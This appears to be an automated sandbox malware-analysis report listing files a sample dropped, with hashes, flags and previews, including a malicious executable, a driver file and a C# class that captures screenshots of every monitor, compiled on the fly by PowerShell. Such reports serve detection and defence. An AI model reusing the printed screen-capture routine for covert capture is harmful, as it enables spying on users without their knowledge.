SHA-512:	879784FA9215055937D28DDD8408C5D14A97B3699139A85405BC11D6EB56F42DBCE85BF76B911640887895DC405F43D51FDCF671107A5EA1AAE1F1669CEAB1E5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..\|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...E.Ec.........." ...!.P..........0W... ................................................`..........................................{..X....y.......p.......................{......................................0c..@...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3edmsjya.rfh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4llr41sc.h54.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vko3pke.rs1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3jvznmk.u2v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0c0txke.zih.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kz5tfti3.s10.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4druxdl.0zr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfjpdsmc.4je.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvbbml4k.x1l.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pey2dcy5.ci2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qamwuzto.aqq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhlrmzex.kya.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa11qamo.4r5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuhge353.yzq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvs3axsc.cur.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zail3dgr.4bu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\instals.exe

Download File

Process:	C:\Users\user\Desktop\47SXvEQ.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5264896
Entropy (8bit):	6.524291250916726
Encrypted:	false
SSDEEP:	98304:GpARPdrGXjhDyjAFUS2JqhqqGFMiKTzHPO4KYL8351+Zm+Dw3a5:GpMNGXJsOd2JqhqqLTrPO4/o351+ZzDF
MD5:	C289921058A4B38BDBD1373A0CBB757D
SHA1:	A70B63234511AFA4176A56AFA2FF5FEBED68E7E5
SHA-256:	DBC71B99B03CBE4B779F17DB23017E22EC6CC8D85BCDAC55FB75B8412CD2B8D0
SHA-512:	8092C0BC272799D7D08294EFC8D9AC08F3F05B7D3335E2426596A6D3AD0E0D89BBE45931CD267BA22CE49FF5A435443498D4DEB2F119075E76EE5492DAE4511C
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....t}g.........."...........O.....@..........@..............................P...........`.....................................................<.............P...............P.x...............................(.......8...............x............................text............................... ..`.rdata...=.......>..................@..@.data...(.O......ZO.................@....pdata........P......NP.............@..@.00cfg........P......PP.............@..@.tls..........P......RP.............@....reloc..x.....P......TP.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sywb4geu\CSC115B186FD93B42ACB9DC75B354DB136.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0950588631558915
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypQak7Ynqq4VPN5Dlq5J:+RI+ycuZhNcakSoPNnqX
MD5:	A12230B7F46905000A7F615B40F2E45E
SHA1:	C784364D2EEC6C9241BD0E49223D746893CADDDA
SHA-256:	0A005C4F3169432337C5AF0C7E85C66BB1F1FF611E53F35E537AA8F54648D3E8
SHA-512:	8756BD46B9FD710EE1FF8CF38D31A291B96A927B4BC92D7DD14BEAF27183AE0C77569FF0E7752D19EF3EC79B2B32AA09C5FDA42C165657AA9F65BE3F2ED5AC36
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.y.w.b.4.g.e.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.y.w.b.4.g.e.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.316867296069762
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfcWZEif5n:V3ka6KOkqeFkOfNEif5
MD5:	565D150160225434A21D1CA34056B9AA
SHA1:	6049CF7BDE1D7B5E188D1BD8962A9FC28B745C05
SHA-256:	931D79F8A4D470B4D5EFAF50B33F0E2E8602822C53F9759876ED889A8B5F714E
SHA-512:	0F0E1A62BB33876782085A95FFEBDDCD623B9C4AD9B1C6463B26B74B27263FAE10FEF6B8ADB49209851C6CF7FB494B65D6D9B23AA246765DEC52226152ACAA1C
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.0.cs"

C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1562016616369992
Encrypted:	false
SSDEEP:	48:6Tq7oEAtf0KhzBU/If6mtJn3N0kpW1ulca3Qq:aNz0HmP3OiqK
MD5:	E0EF9E9B62C86D030DD1814A6BAA0264
SHA1:	5090484471FAE6E536EE935EFC1E612CCBFD278F
SHA-256:	76100819C394BCF1092D3AC27EBD96DF8FA3C12D7D2B57C0ED262754BB563C96
SHA-512:	4E9ADA3A0BEDF8BE73651F362010AEDB7591C51F8619001BE68BB27589143F343ECECFF7344A976249CE70D9785E98ADEF53938A6476769415A74E0540C61935
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.490080645924157
Encrypted:	false
SSDEEP:	24:KJfAOId3ka6KOkqeFkOfNEif8Kax5DqBVKVrdFAMBJTH:uXkka6NkqeFkyNEu8K2DcVKdBJj
MD5:	45E4E9FE7F11D2866F2DCADEEB157058
SHA1:	FB0082ABECA375F00BDEDD6C0EFB02D9EF7D3057
SHA-256:	689AA496831D297809733D1E741AB93CB55BECE0B44C2A7468C90769334ADC4A
SHA-512:	0EFFB0312F161234EBC0CD614F7EAE938D93DDE19DDD22D889C81F19182D9430A3BA28DBD39A2DDE3617EE38D28AD79C232D113A6419E2610326CE425B9272D5
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul2lllllZ:NllUClll
MD5:	4D98AF7F487E62A9C1D44B02674BAB7E
SHA1:	1B492B2208949EB7F18C32F309C296B4258DBA65
SHA-256:	1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
SHA-512:	60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
Malicious:	false
Preview:	@...e.................................:..............@..........

C:\Windows\Temp\__PSScriptPolicyTest_asewr5ng.fm0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_fpekgtoi.xrk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_gfmxveae.u0v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_zoxgf4yj.vxp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\qnibnfgnagzt.sys

Download File

Process:	C:\ProgramData\Microsoft\svchost.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
